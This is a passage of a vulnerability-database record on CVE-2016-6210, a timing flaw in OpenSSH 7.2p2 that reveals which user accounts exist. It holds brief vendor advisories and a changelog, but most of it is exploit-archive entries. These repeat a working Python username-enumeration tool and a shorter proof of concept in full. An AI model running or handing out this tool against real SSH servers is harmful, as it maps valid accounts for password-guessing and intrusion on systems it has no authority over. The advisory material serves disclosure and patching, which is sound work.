Compiler warnings (#1341754)\n[7.4p1-10 + 0.10.3-1]\n- Add missing messages in FIPS mode (#1341754)\n[7.4p1-9 + 0.10.3-1]\n- Allow harmless syscalls for s390 crypto modules (#1451809)\n[7.4p1-8 + 0.10.3-1]\n- Fix multilib issue in documentation (#1450361)\n[7.4p1-6 + 0.10.3-1]\n- ControlPath too long should not be a fatal error (#1447561)\n[7.4p1-5 + 0.10.3-1]\n- Fix the default key exchange proposal in FIPS mode (#1438414)\n- Remove another wrong coverity chunk to unbreak gsskex (#1438414)\n[7.4p1-4 + 0.10.3-1]\n- Update seccomp filter to work on ppc64le (#1443916)\n[7.4p1-3 + 0.10.3-1]\n- Do not completely disable SHA-1 key exchange methods in FIPS (#1324493)\n- Remove wrong coverity patches\n[7.4p1-2 + 0.10.3-1]\n- Fix coverity scan results\n- Adjust FIPS algorithms list (#1420910)\n- Revert problematic feature for chroot(#1418062)\n- Fix CBC weakness in released OpenSSH 7.5\n[7.4p1-1 + 0.10.3-1]\n- Rebase to openssh 7.4 and pam_ssh_agent_auth 0.10.3 (#1341754)\n- detach -cavs subpackage\n- enable seccomp filter for sandboxed child", "edition": 5, "modified": "2017-08-07T00:00:00", "published": "2017-08-07T00:00:00", "id": "ELSA-2017-2029", "href": "http://linux.oracle.com/errata/ELSA-2017-2029.html", "title": "openssh security, bug fix, and enhancement update", "type": "oraclelinux", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:39", "description": "\nOpenSSH 7.2p2 - Username Enumeration", "edition": 1, "published": "2016-07-20T00:00:00", "title": "OpenSSH 7.2p2 - Username Enumeration", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-6210"], "modified": "2016-07-20T00:00:00", "id": "EXPLOITPACK:802AF3229492E147A5F09C7F2B27C6DF", "href": "", "sourceData": "#!/usr/bin/python\n#\n# CVEs: CVE-2016-6210 (Credits for this go to Eddie Harari)\n#\n# Author: 0_o -- null_null\n# nu11.nu11 [at] yahoo.com\n# Oh, and it is n-u-one-one.n-u-one-one, no l's...\n# Wonder how the guys at packet storm could get this wrong :(\n# \n# Date: 2016-07-19\n# \n# Purpose: User name enumeration against SSH daemons affected by CVE-2016-6210. \n# \n# Prerequisites: Network access to the SSH daemon.\n#\n# DISCLAIMER: Use against your own hosts only! Attacking stuff you are not \n# permitted to may put you in big trouble!\n#\n# And now - the fun part :-)\n# \n\n\nimport paramiko\nimport time\nimport numpy\nimport argparse\nimport sys\n\nargs = None\n\nclass bcolors:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\n\ndef get_args():\n parser = argparse.ArgumentParser()\n group = parser.add_mutually_exclusive_group()\n parser.add_argument(\"host\", type = str, help = \"Give SSH server address like ip:port or just by ip\")\n group.add_argument(\"-u\", \"--user\", type = str, help = \"Give a single user name\")\n group.add_argument(\"-U\", \"--userlist\", type = str, help = \"Give a file containing a list of users\")\n parser.add_argument(\"-e\", \"--enumerated\", action = \"store_true\", help = \"Only show enumerated users\")\n parser.add_argument(\"-s\", \"--silent\", action = \"store_true\", help = \"Like -e, but just the user names will be written to stdout (no banner, no anything)\")\n parser.add_argument(\"--bytes\", default = 50000, type = int, help = \"Send so many BYTES to the SSH daemon as a password\")\n parser.add_argument(\"--samples\", default = 12, type = int, help = \"Collect so many SAMPLES to calculate a timing baseline for authenticating non-existing users\")\n parser.add_argument(\"--factor\", default = 3.0, type = float, help = \"Used to compute the upper timing boundary for user enumeration\")\n parser.add_argument(\"--trials\", default = 1, type = int, help = \"try to authenticate user X for TRIALS times and compare the mean of auth timings against the timing boundary\")\n args = parser.parse_args()\n return args\n\n\ndef get_banner(host, port):\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n try:\n ssh.connect(hostname = host, port = port, username = 'invalidinvalidinvalid', password = 'invalidinvalidinvalid')\n except:\n banner = ssh.get_transport().remote_version\n ssh.close()\n return banner\n\n\ndef connect(host, port, user):\n global args\n starttime = 0.0\n endtime = 0.0\n p = 'B' * int(args.bytes)\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n starttime=time.clock()\n try:\n ssh.connect(hostname = host, port = port, username = user, password = p, look_for_keys = False, gss_auth = False, gss_kex = False, gss_deleg_creds = False, gss_host = None, allow_agent = False)\n except:\n endtime=time.clock()\n finally:\n ssh.close()\n return endtime - starttime\n\n\n\ndef main():\n global args\n args = get_args()\n if not args.silent: print(\"\\n\\nUser name enumeration against SSH daemons affected by CVE-2016-6210\")\n if not args.silent: print(\"Created and coded by 0_o (nu11.nu11 [at] yahoo.com), PoC by Eddie Harari\\n\\n\")\n if args.host:\n host = args.host.split(\":\")[0]\n try:\n port = int(args.host.split(\":\")[1])\n except IndexError:\n port = 22\n users = []\n if args.user:\n users.append(args.user)\n elif args.userlist:\n with open(args.userlist, \"r\") as f:\n users = f.readlines()\n else:\n if not args.silent: print(bcolors.FAIL + \"[!] \" + bcolors.ENDC + \"You must give a user or a list of users\")\n sys.exit()\n if not args.silent: print(bcolors.OKBLUE + \"[*] \" + bcolors.ENDC + \"Testing SSHD at: \" + bcolors.BOLD + str(host) + \":\" + str(port) + bcolors.ENDC + \", Banner: \" + bcolors.BOLD + get_banner(host, port) + bcolors.ENDC)\n # get baseline timing for non-existing users...\n baseline_samples = []\n baseline_mean = 0.0\n baseline_deviation = 0.0\n if not args.silent: sys.stdout.write(bcolors.OKBLUE + \"[*] \" + bcolors.ENDC + \"Getting baseline timing for authenticating non-existing users\")\n for i in range(1, int(args.samples) + 1):\n if not args.silent: sys.stdout.write('.')\n if not args.silent: sys.stdout.flush()\n sample = connect(host, port, 'foobar-bleh-nonsense' + str(i))\n baseline_samples.append(sample)\n if not args.silent: sys.stdout.write('\\n')\n # remove the biggest and smallest value\n baseline_samples.sort()\n baseline_samples.pop()\n baseline_samples.reverse()\n baseline_samples.pop()\n # do math\n baseline_mean = numpy.mean(numpy.array(baseline_samples))\n baseline_deviation = numpy.std(numpy.array(baseline_samples))\n if not args.silent: print(bcolors.OKBLUE + \"[*] \" + bcolors.ENDC + \"Baseline mean for host \" + host + \" is \" + str(baseline_mean) + \" seconds.\")\n if not args.silent: print(bcolors.OKBLUE + \"[*] \" + bcolors.ENDC + \"Baseline variation for host \" + host + \" is \" + str(baseline_deviation) + \" seconds.\")\n upper = baseline_mean + float(args.factor) * baseline_deviation\n if not args.silent: print(bcolors.WARNING + \"[*] \" + bcolors.ENDC + \"Defining timing of x < \" + str(upper) + \" as non-existing user.\")\n if not args.silent: print(bcolors.OKBLUE + \"[*] \" + bcolors.ENDC + \"Testing your users...\")\n # \n # Get timing for the given user name...\n #\n for u in users:\n user = u.strip()\n enum_samples = []\n enum_mean = 0.0\n for t in range(0, int(args.trials)):\n timeval = connect(host, port, user)\n enum_samples.append(timeval)\n enum_mean = numpy.mean(numpy.array(enum_samples))\n if (enum_mean < upper):\n if not (args.enumerated or args.silent) : \n print(bcolors.FAIL + \"[-] \" + bcolors.ENDC + user + \" - timing: \" + str(enum_mean))\n else:\n if not args.silent: \n print(bcolors.OKGREEN + \"[+] \" + bcolors.ENDC + user + \" - timing: \" + str(enum_mean))\n else: \n print(user)\n\n\n\n\nif __name__ == \"__main__\":\n main()", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-04-01T19:04:39", "description": "\nOpenSSHd 7.2p2 - Username Enumeration", "edition": 1, "published": "2016-07-18T00:00:00", "title": "OpenSSHd 7.2p2 - Username Enumeration", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-6210"], "modified": "2016-07-18T00:00:00", "id": "EXPLOITPACK:5652DDAA7FE452E19AC0DC1CD97BA3EF", "href": "", "sourceData": "Source: http://seclists.org/fulldisclosure/2016/Jul/51\n\n--------------------------------------------------------------------\nUser Enumeration using Open SSHD (<=Latest version).\n-------------------------------------------------------------------\n\nAbstract:\n-----------\nBy sending large passwords, a remote user can enumerate users on system that runs SSHD. This problem exists in most \nmodern configuration due to the fact that it takes much longer to calculate SHA256/SHA512 hash than BLOWFISH hash.\n\nCVE-ID\n---------\nCVE-2016-6210\n\nTested versions\n--------------------\nThis issue was tested on : opensshd-7.2p2 ( should be possible on most earlier versions as well).\n\nFix\n-----------------\nThis issue was reported to OPENSSH developer group and they have sent a patch ( don't know if patch was released yet).\n(thanks to 'dtucker () zip com au' for his quick reply and fix suggestion).\n\nDetails\n----------------\nWhen SSHD tries to authenticate a non-existing user, it will pick up a fake password structure hardcoded in the SSHD \nsource code. On this hard coded password structure the password hash is based on BLOWFISH ($2) algorithm.\nIf real users passwords are hashed using SHA256/SHA512, then sending large passwords (10KB) will result in shorter \nresponse time from the server for non-existing users.\n\nSample code:\n----------------\nimport paramiko\nimport time\nuser=raw_input(\"user: \")\np='A'*25000\nssh = paramiko.SSHClient()\nstarttime=time.clock()\nssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\ntry:\n ssh.connect('127.0.0.1', username=user,\n password=p)\nexcept:\n endtime=time.clock()\ntotal=endtime-starttime\nprint(total)\n\n(Valid users will result in higher total time).\n\n*** please note that if SSHD configuration prohibits root login , then root is not considered as valid user...\n\n*** when TCP timestamp option is enabled the best way to measure the time would be using timestamps from the TCP \npackets of the server, since this will eliminate any network delays on the way.\n\nEddie Harari", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "paloalto": [{"lastseen": "2020-12-24T13:20:54", "bulletinFamily": "software", "cvelist": ["CVE-2016-6210"], "description": "Palo Alto Networks makes use of a the OpenSSH tool. CVE-2016-6210 was recently confirmed to be applicable to the version in use by PAN-OS. (Ref # 100977/CVE-2016-6210).\nTo exploit this vulnerability, an attacker would have to guess usernames defined as system administrators on the firewall.\nThis issue affects PAN-OS 5.0.X and earlier; PAN-OS 5.1.X and earlier; PAN-OS 6.0.14 and earlier; PAN-OS 6.1.14 and earlier; PAN-OS 7.0.10 and earlier; PAN-OS 7.1.5 and earlier\n\n**Work around:**\nPalo Alto Networks recommends following best practices by not relying on hidden usernames and setting unique, long, and complex passwords for each of the firewall users.", "edition": 6, "modified": "2016-11-17T17:02:00", "published": "2016-11-17T17:02:00", "id": "PAN-SA-2016-0036", "href": "https://securityadvisories.paloaltonetworks.com/CVE-2016-6210", "title": "OpenSSH Vulnerability", "type": "paloalto", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "fedora": [{"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-6210"], "description": "SSH (Secure SHell) is a program for logging into and executing commands on a remote machine. SSH is intended to replace rlogin and rsh, and to provide secure encrypted communications between two untrusted hosts over an insecure network. X11 connections and arbitrary TCP/IP ports can also be forwarded over the secure channel. OpenSSH is OpenBSD's version of the last free version of SSH, bringing it up to date in terms of security and features. This package includes the core files necessary for both the OpenSSH client and server. To make this package useful, you should also install openssh-clients, openssh-server, or both. ", "modified": "2016-07-20T17:50:40", "published": "2016-07-20T17:50:40", "id": "FEDORA:95DA6605E7DF", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: openssh-7.2p2-10.fc24", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "packetstorm": [{"lastseen": "2016-12-05T22:23:29", "description": "", "published": "2016-07-18T00:00:00", "type": "packetstorm", "title": "OpenSSHD 7.2p2 User Enumeration", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-6210"], "modified": "2016-07-18T00:00:00", "id": "PACKETSTORM:137942", "href": "https://packetstormsecurity.com/files/137942/OpenSSHD-7.2p2-User-Enumeration.html", "sourceData": "`-------------------------------------------------------------------- \nUser Enumeration using Open SSHD (<=Latest version). \n------------------------------------------------------------------- \n \nAbstract: \n----------- \nBy sending large passwords, a remote user can enumerate users on system that runs SSHD. This problem exists in most \nmodern configuration due to the fact that it takes much longer to calculate SHA256/SHA512 hash than BLOWFISH hash. \n \nCVE-ID \n--------- \nCVE-2016-6210 \n \nTested versions \n-------------------- \nThis issue was tested on : opensshd-7.2p2 ( should be possible on most earlier versions as well). \n \nFix \n----------------- \nThis issue was reported to OPENSSH developer group and they have sent a patch ( don't know if patch was released yet). \n(thanks to 'dtucker () zip com au' for his quick reply and fix suggestion). \n \nDetails \n---------------- \nWhen SSHD tries to authenticate a non-existing user, it will pick up a fake password structure hardcoded in the SSHD \nsource code. On this hard coded password structure the password hash is based on BLOWFISH ($2) algorithm. \nIf real users passwords are hashed using SHA256/SHA512, then sending large passwords (10KB) will result in shorter \nresponse time from the server for non-existing users. \n \nSample code: \n---------------- \nimport paramiko \nimport time \nuser=raw_input(\"user: \") \np='A'*25000 \nssh = paramiko.SSHClient() \nstarttime=time.clock() \nssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) \ntry: \nssh.connect('127.0.0.1', username=user, \npassword=p) \nexcept: \nendtime=time.clock() \ntotal=endtime-starttime \nprint(total) \n \n(Valid users will result in higher total time). \n \n*** please note that if SSHD configuration prohibits root login , then root is not considered as valid user... \n \n*** when TCP timestamp option is enabled the best way to measure the time would be using timestamps from the TCP \npackets of the server, since this will eliminate any network delays on the way. \n \nEddie Harari \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/137942/openssh-enumerate.txt"}, {"lastseen": "2016-12-05T22:17:24", "description": "", "published": "2016-07-21T00:00:00", "type": "packetstorm", "title": "OpenSSHD 7.2p2 User Enumeration", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-6210"], "modified": "2016-07-21T00:00:00", "id": "PACKETSTORM:138006", "href": "https://packetstormsecurity.com/files/138006/OpenSSHD-7.2p2-User-Enumeration.html", "sourceData": "`#!/usr/bin/python \n# \n# CVEs: CVE-2016-6210 (Credits for this go to Eddie Harari) \n# \n# Author: 0_o -- null_null \n# nu11.nu11 [at] yahoo.com \n# Oh, and it is n-u-one-one.n-u-one-one, no l's... \n# Wonder how the guys at packet storm could get this wrong :( \n# \n# Date: 2016-07-19 \n# \n# Purpose: User name enumeration against SSH daemons affected by CVE-2016-6210. \n# \n# Prerequisites: Network access to the SSH daemon. \n# \n# DISCLAIMER: Use against your own hosts only! Attacking stuff you are not \n# permitted to may put you in big trouble! \n# \n# And now - the fun part :-) \n# \n \n \nimport paramiko \nimport time \nimport numpy \nimport argparse \nimport sys \n \nargs = None \n \nclass bcolors: \nHEADER = '\\033[95m' \nOKBLUE = '\\033[94m' \nOKGREEN = '\\033[92m' \nWARNING = '\\033[93m' \nFAIL = '\\033[91m' \nENDC = '\\033[0m' \nBOLD = '\\033[1m' \nUNDERLINE = '\\033[4m' \n \n \ndef get_args(): \nparser = argparse.ArgumentParser() \ngroup = parser.add_mutually_exclusive_group() \nparser.add_argument(\"host\", type = str, help = \"Give SSH server address like ip:port or just by ip\") \ngroup.add_argument(\"-u\", \"--user\", type = str, help = \"Give a single user name\") \ngroup.add_argument(\"-U\", \"--userlist\", type = str, help = \"Give a file containing a list of users\") \nparser.add_argument(\"-e\", \"--enumerated\", action = \"store_true\", help = \"Only show enumerated users\") \nparser.add_argument(\"-s\", \"--silent\", action = \"store_true\", help = \"Like -e, but just the user names will be written to stdout (no banner, no anything)\") \nparser.add_argument(\"--bytes\", default = 50000, type = int, help = \"Send so many BYTES to the SSH daemon as a password\") \nparser.add_argument(\"--samples\", default = 12, type = int, help = \"Collect so many SAMPLES to calculate a timing baseline for authenticating non-existing users\") \nparser.add_argument(\"--factor\", default = 3.0, type = float, help = \"Used to compute the upper timing boundary for user enumeration\") \nparser.add_argument(\"--trials\", default = 1, type = int, help = \"try to authenticate user X for TRIALS times and compare the mean of auth timings against the timing boundary\") \nargs = parser.parse_args() \nreturn args \n \n \ndef get_banner(host, port): \nssh = paramiko.SSHClient() \nssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) \ntry: \nssh.connect(hostname = host, port = port, username = 'invalidinvalidinvalid', password = 'invalidinvalidinvalid') \nexcept: \nbanner = ssh.get_transport().remote_version \nssh.close() \nreturn banner \n \n \ndef connect(host, port, user): \nglobal args \nstarttime = 0.0 \nendtime = 0.0 \np = 'B' * int(args.bytes) \nssh = paramiko.SSHClient() \nssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) \nstarttime=time.clock() \ntry: \nssh.connect(hostname = host, port = port, username = user, password = p, look_for_keys = False, gss_auth = False, gss_kex = False, gss_deleg_creds = False, gss_host = None, allow_agent = False) \nexcept: \nendtime=time.clock() \nfinally: \nssh.close() \nreturn endtime - starttime \n \n \n \ndef main(): \nglobal args \nargs = get_args() \nif not args.silent: print(\"\\n\\nUser name enumeration against SSH daemons affected by CVE-2016-6210\") \nif not args.silent: print(\"Created and coded by 0_o (nu11.nu11 [at] yahoo.com), PoC by Eddie Harari\\n\\n\") \nif args.host: \nhost = args.host.split(\":\")[0] \ntry: \nport = int(args.host.split(\":\")[1]) \nexcept IndexError: \nport = 22 \nusers = [] \nif args.user: \nusers.append(args.user) \nelif args.userlist: \nwith open(args.userlist, \"r\") as f: \nusers = f.readlines() \nelse: \nif not args.silent: print(bcolors.FAIL + \"[!] \" + bcolors.ENDC + \"You must give a user or a list of users\") \nsys.exit() \nif not args.silent: print(bcolors.OKBLUE + \"[*] \" + bcolors.ENDC + \"Testing SSHD at: \" + bcolors.BOLD + str(host) + \":\" + str(port) + bcolors.ENDC + \", Banner: \" + bcolors.BOLD + get_banner(host, port) + bcolors.ENDC) \n# get baseline timing for non-existing users... \nbaseline_samples = [] \nbaseline_mean = 0.0 \nbaseline_deviation = 0.0 \nif not args.silent: sys.stdout.write(bcolors.OKBLUE + \"[*] \" + bcolors.ENDC + \"Getting baseline timing for authenticating non-existing users\") \nfor i in range(1, int(args.samples) + 1): \nif not args.silent: sys.stdout.write('.') \nif not args.silent: sys.stdout.flush() \nsample = connect(host, port, 'foobar-bleh-nonsense' + str(i)) \nbaseline_samples.append(sample) \nif not args.silent: sys.stdout.write('\\n') \n# remove the biggest and smallest value \nbaseline_samples.sort() \nbaseline_samples.pop() \nbaseline_samples.reverse() \nbaseline_samples.pop() \n# do math \nbaseline_mean = numpy.mean(numpy.array(baseline_samples)) \nbaseline_deviation = numpy.std(numpy.array(baseline_samples)) \nif not args.silent: print(bcolors.OKBLUE + \"[*] \" + bcolors.ENDC + \"Baseline mean for host \" + host + \" is \" + str(baseline_mean) + \" seconds.\") \nif not args.silent: print(bcolors.OKBLUE + \"[*] \" + bcolors.ENDC + \"Baseline variation for host \" + host + \" is \" + str(baseline_deviation) + \" seconds.\") \nupper = baseline_mean + float(args.factor) * baseline_deviation \nif not args.silent: print(bcolors.WARNING + \"[*] \" + bcolors.ENDC + \"Defining timing of x < \" + str(upper) + \" as non-existing user.\") \nif not args.silent: print(bcolors.OKBLUE + \"[*] \" + bcolors.ENDC + \"Testing your users...\") \n# \n# Get timing for the given user name... \n# \nfor u in users: \nuser = u.strip() \nenum_samples = [] \nenum_mean = 0.0 \nfor t in range(0, int(args.trials)): \ntimeval = connect(host, port, user) \nenum_samples.append(timeval) \nenum_mean = numpy.mean(numpy.array(enum_samples)) \nif (enum_mean < upper): \nif not (args.enumerated or args.silent) : \nprint(bcolors.FAIL + \"[-] \" + bcolors.ENDC + user + \" - timing: \" + str(enum_mean)) \nelse: \nif not args.silent: \nprint(bcolors.OKGREEN + \"[+] \" + bcolors.ENDC + user + \" - timing: \" + str(enum_mean)) \nelse: \nprint(user) \n \n \n \n \nif __name__ == \"__main__\": \nmain() \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/138006/opensshd72p2-enumerate.txt"}], "archlinux": [{"lastseen": "2016-09-02T18:44:46", "bulletinFamily": "unix", "cvelist": ["CVE-2016-6210"], "description": "Mitigate timing differences in password authentication that could be\nused to discern valid from invalid account names when long passwords\nwere sent and particular password hashing algorithms are in use on the\nserver. Reported by EddieEzra.Harari at verint.com", "modified": "2016-08-02T00:00:00", "published": "2016-08-02T00:00:00", "id": "ASA-201608-1", "href": "https://lists.archlinux.org/pipermail/arch-security/2016-August/000675.html", "type": "archlinux", "title": "openssh: information leakage", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-01-09T21:04:52", "edition": 2, "description": "Exploit for linux platform in category remote exploits", "published": "2016-07-18T00:00:00", "type": "zdt", "title": "OpenSSHd 7.2p2 - Username Enumeration (1)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-6210"], "modified": "2016-07-18T00:00:00", "id": "1337DAY-ID-25438", "href": "https://0day.today/exploit/description/25438", "sourceData": "Source: http://seclists.org/fulldisclosure/2016/Jul/51\r\n \r\n--------------------------------------------------------------------\r\nUser Enumeration using Open SSHD (<=Latest version).\r\n-------------------------------------------------------------------\r\n \r\nAbstract:\r\n-----------\r\nBy sending large passwords, a remote user can enumerate users on system that runs SSHD. This problem exists in most \r\nmodern configuration due to the fact that it takes much longer to calculate SHA256/SHA512 hash than BLOWFISH hash.\r\n \r\nCVE-ID\r\n---------\r\nCVE-2016-6210\r\n \r\nTested versions\r\n--------------------\r\nThis issue was tested on : opensshd-7.2p2 ( should be possible on most earlier versions as well).\r\n \r\nFix\r\n-----------------\r\nThis issue was reported to OPENSSH developer group and they have sent a patch ( don't know if patch was released yet).\r\n(thanks to 'dtucker () zip com au' for his quick reply and fix suggestion).\r\n \r\nDetails\r\n----------------\r\nWhen SSHD tries to authenticate a non-existing user, it will pick up a fake password structure hardcoded in the SSHD \r\nsource code. On this hard coded password structure the password hash is based on BLOWFISH ($2) algorithm.\r\nIf real users passwords are hashed using SHA256/SHA512, then sending large passwords (10KB) will result in shorter \r\nresponse time from the server for non-existing users.\r\n \r\nSample code:\r\n----------------\r\nimport paramiko\r\nimport time\r\nuser=raw_input(\"user: \")\r\np='A'*25000\r\nssh = paramiko.SSHClient()\r\nstarttime=time.clock()\r\nssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\r\ntry:\r\n ssh.connect('127.0.0.1', username=user,\r\n password=p)\r\nexcept:\r\n endtime=time.clock()\r\ntotal=endtime-starttime\r\nprint(total)\r\n \r\n(Valid users will result in higher total time).\r\n \r\n*** please note that if SSHD configuration prohibits root login , then root is not considered as valid user...\r\n \r\n*** when TCP timestamp option is enabled the best way to measure the time would be using timestamps from the TCP \r\npackets of the server, since this will eliminate any network delays on the way.\r\n \r\nEddie Harari\n\n# 0day.today [2018-01-09] #", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/25438"}, {"lastseen": "2018-01-03T05:01:25", "edition": 2, "description": "Exploit for linux platform in category remote exploits", "published": "2016-07-20T00:00:00", "type": "zdt", "title": "OpenSSHd 7.2p2 - Username Enumeration (2)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-6210"], "modified": "2016-07-20T00:00:00", "id": "1337DAY-ID-25440", "href": "https://0day.today/exploit/description/25440", "sourceData": "#!/usr/bin/python\r\n#\r\n# CVEs: CVE-2016-6210 (Credits for this go to Eddie Harari)\r\n#\r\n# Author: 0_o -- null_null\r\n# nu11.nu11 [at] yahoo.com\r\n# Oh, and it is n-u-one-one.n-u-one-one, no l's...\r\n# Wonder how the guys at packet storm could get this wrong :(\r\n# \r\n# Date: 2016-07-19\r\n# \r\n# Purpose: User name enumeration against SSH daemons affected by CVE-2016-6210. \r\n# \r\n# Prerequisites: Network access to the SSH daemon.\r\n#\r\n# DISCLAIMER: Use against your own hosts only! Attacking stuff you are not \r\n# permitted to may put you in big trouble!\r\n#\r\n# And now - the fun part :-)\r\n# \r\n \r\n \r\nimport paramiko\r\nimport time\r\nimport numpy\r\nimport argparse\r\nimport sys\r\n \r\nargs = None\r\n \r\nclass bcolors:\r\n HEADER = '\\033[95m'\r\n OKBLUE = '\\033[94m'\r\n OKGREEN = '\\033[92m'\r\n WARNING = '\\033[93m'\r\n FAIL = '\\033[91m'\r\n ENDC = '\\033[0m'\r\n BOLD = '\\033[1m'\r\n UNDERLINE = '\\033[4m'\r\n \r\n \r\ndef get_args():\r\n parser = argparse.ArgumentParser()\r\n group = parser.add_mutually_exclusive_group()\r\n parser.add_argument(\"host\", type = str, help = \"Give SSH server address like ip:port or just by ip\")\r\n group.add_argument(\"-u\", \"--user\", type = str, help = \"Give a single user name\")\r\n group.add_argument(\"-U\", \"--userlist\", type = str, help = \"Give a file containing a list of users\")\r\n parser.add_argument(\"-e\", \"--enumerated\", action = \"store_true\", help = \"Only show enumerated users\")\r\n parser.add_argument(\"-s\", \"--silent\", action = \"store_true\", help = \"Like -e, but just the user names will be written to stdout (no banner, no anything)\")\r\n parser.add_argument(\"--bytes\", default = 50000, type = int, help = \"Send so many BYTES to the SSH daemon as a password\")\r\n parser.add_argument(\"--samples\", default = 12, type = int, help = \"Collect so many SAMPLES to calculate a timing baseline for authenticating non-existing users\")\r\n parser.add_argument(\"--factor\", default = 3.0, type = float, help = \"Used to compute the upper timing boundary for user enumeration\")\r\n parser.add_argument(\"--trials\", default = 1, type = int, help = \"try to authenticate user X for TRIALS times and compare the mean of auth timings against the timing boundary\")\r\n args = parser.parse_args()\r\n return args\r\n \r\n \r\ndef get_banner(host, port):\r\n ssh = paramiko.SSHClient()\r\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\r\n try:\r\n ssh.connect(hostname = host, port = port, username = 'invalidinvalidinvalid', password = 'invalidinvalidinvalid')\r\n except:\r\n banner = ssh.get_transport().remote_version\r\n ssh.close()\r\n return banner\r\n \r\n \r\ndef connect(host, port, user):\r\n global args\r\n starttime = 0.0\r\n endtime = 0.0\r\n p = 'B' * int(args.bytes)\r\n ssh = paramiko.SSHClient()\r\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\r\n starttime=time.clock()\r\n try:\r\n ssh.connect(hostname = host, port = port, username = user, password = p, look_for_keys = False, gss_auth = False, gss_kex = False, gss_deleg_creds = False, gss_host = None, allow_agent = False)\r\n except:\r\n endtime=time.clock()\r\n finally:\r\n ssh.close()\r\n return endtime - starttime\r\n \r\n \r\n \r\ndef main():\r\n global args\r\n args = get_args()\r\n if not args.silent: print(\"\\n\\nUser name enumeration against SSH daemons affected by CVE-2016-6210\")\r\n if not args.silent: print(\"Created and coded by 0_o (nu11.nu11 [at] yahoo.com), PoC by Eddie Harari\\n\\n\")\r\n if args.host:\r\n host = args.host.split(\":\")[0]\r\n try:\r\n port = int(args.host.split(\":\")[1])\r\n except IndexError:\r\n port = 22\r\n users = []\r\n if args.user:\r\n users.append(args.user)\r\n elif args.userlist:\r\n with open(args.userlist, \"r\") as f:\r\n users = f.readlines()\r\n else:\r\n if not args.silent: print(bcolors.FAIL + \"[!] \" + bcolors.ENDC + \"You must give a user or a list of users\")\r\n sys.exit()\r\n if not args.silent: print(bcolors.OKBLUE + \"[*] \" + bcolors.ENDC + \"Testing SSHD at: \" + bcolors.BOLD + str(host) + \":\" + str(port) + bcolors.ENDC + \", Banner: \" + bcolors.BOLD + get_banner(host, port) + bcolors.ENDC)\r\n # get baseline timing for non-existing users...\r\n baseline_samples = []\r\n baseline_mean = 0.0\r\n baseline_deviation = 0.0\r\n if not args.silent: sys.stdout.write(bcolors.OKBLUE + \"[*] \" + bcolors.ENDC + \"Getting baseline timing for authenticating non-existing users\")\r\n for i in range(1, int(args.samples) + 1):\r\n if not args.silent: sys.stdout.write('.')\r\n if not args.silent: sys.stdout.flush()\r\n sample = connect(host, port, 'foobar-bleh-nonsense' + str(i))\r\n baseline_samples.append(sample)\r\n if not args.silent: sys.stdout.write('\\n')\r\n # remove the biggest and smallest value\r\n baseline_samples.sort()\r\n baseline_samples.pop()\r\n baseline_samples.reverse()\r\n baseline_samples.pop()\r\n # do math\r\n baseline_mean = numpy.mean(numpy.array(baseline_samples))\r\n baseline_deviation = numpy.std(numpy.array(baseline_samples))\r\n if not args.silent: print(bcolors.OKBLUE + \"[*] \" + bcolors.ENDC + \"Baseline mean for host \" + host + \" is \" + str(baseline_mean) + \" seconds.\")\r\n if not args.silent: print(bcolors.OKBLUE + \"[*] \" + bcolors.ENDC + \"Baseline variation for host \" + host + \" is \" + str(baseline_deviation) + \" seconds.\")\r\n upper = baseline_mean + float(args.factor) * baseline_deviation\r\n if not args.silent: print(bcolors.WARNING + \"[*] \" + bcolors.ENDC + \"Defining timing of x < \" + str(upper) + \" as non-existing user.\")\r\n if not args.silent: print(bcolors.OKBLUE + \"[*] \" + bcolors.ENDC + \"Testing your users...\")\r\n # \r\n # Get timing for the given user name...\r\n #\r\n for u in users:\r\n user = u.strip()\r\n enum_samples = []\r\n enum_mean = 0.0\r\n for t in range(0, int(args.trials)):\r\n timeval = connect(host, port, user)\r\n enum_samples.append(timeval)\r\n enum_mean = numpy.mean(numpy.array(enum_samples))\r\n if (enum_mean < upper):\r\n if not (args.enumerated or args.silent) : \r\n print(bcolors.FAIL + \"[-] \" + bcolors.ENDC + user + \" - timing: \" + str(enum_mean))\r\n else:\r\n if not args.silent: \r\n print(bcolors.OKGREEN + \"[+] \" + bcolors.ENDC + user + \" - timing: \" + str(enum_mean))\r\n else: \r\n print(user)\r\n \r\n \r\n \r\n \r\nif __name__ == \"__main__\":\r\n main()\n\n# 0day.today [2018-01-03] #", 